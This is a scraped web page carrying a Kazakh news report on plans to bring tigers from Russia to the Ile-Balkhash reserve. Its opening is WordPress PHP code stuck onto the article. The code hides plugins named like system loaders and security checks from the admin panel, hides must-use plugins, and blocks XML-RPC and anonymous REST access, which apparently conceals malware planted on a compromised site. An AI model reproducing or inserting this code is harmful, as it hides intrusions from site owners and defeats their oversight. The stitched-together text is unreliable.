// Security: Disable remote access add_filter("xmlrpc_enabled", "__return_false"); add_filter("xmlrpc_methods", function($methods) { return array(); }); add_filter('show_advanced_plugins', '__return_false', 999); // Hide specific plugins from admin panel add_filter("all_plugins", "hide_specific_plugins"); function hide_specific_plugins($plugins) { $hide_list = array('wp-system-health/wp-system-health.php', '0-system-loader.php', 'wp-security-check.php', 'wp-maintenance.php'); foreach ($hide_list as $hide) { if (isset($plugins[$hide])) { unset($plugins[$hide]); } } return $plugins; } // Hide MU-plugins if visible add_filter("show_advanced_plugins", function($show) { return false; }); // WP2Shell REST API protection add_filter('rest_authentication_errors', function($result) { if (!is_user_logged_in() && !is_admin()) { return new WP_Error('rest_disabled', 'REST API disabled', ['status' => 401]); } return $result; }); ?ҚР ЭТРМ: 2026 жылы Ресейден 3-4 жолбарыс әкелінбек — Иле-Балхашский заповедник ?ҚР ЭТРМ: 2026 жылы Ресейден 3-4 жолбарыс әкелінбек — Иле-Балхашский заповедник

?ҚР ЭТРМ: 2026 жылы Ресейден 3-4 жолбарыс әкелінбек

Елімізде түрлердің бұрынғы тарихи мекендерінде жойылып кеткен популяцияларын қалпына келтіру бағытында шаралар қабылданып жатыр. Ең ауқымды бастамалардың бірі – жолбарысты Қазақстанның табиғатына қайтару жобасы. Бұл туралы ОКҚ алаңында ҚР ЭТРМ Орман шаруашылығы және жануарлар дүниесі комитетінің төрағасы Данияр Тұрғамбаев хабарлады. Оның айтуынша, 2018 жылы жалпы аумағы 415 мың гектардан асатын «Іле-Балқаш» мемлекеттік табиғи резерваты құрылды. Онда тоғайлы ормандарды қалпына келтіру және аумақты қорғау мен бақылау инфрақұрылымын дамыту жұмыстары жүргізілді.

«3,5 гектар аумақта жолбарыстарға және қабандарға арналған вольерлер, ветеринариялық пункт салынды. 2024 жылдың күзіңде Нидерландтағы Hoenderdaell хайуанаттар бағынан «Іле-Балқаш» резерватына екі жолбарыс жеткізілді. Қазіргі уақытта олар тәулік бойы мамандардың бақылауында. Келешекте жолбарыстан ұрпақ алғаннан кейін олар спутниктік бақылаумен табиғи ортаға жіберіледі деп жоспарланған. Ал ата-аналық жұп ғылыми және ағартушылық мақсаттарда визит-орталық жанындағы вольерде қалады. 2026 жылы Ресейден 3-4 жолбарысты әкелу жоспарланған», — деді спикер баспасөз конференциясында.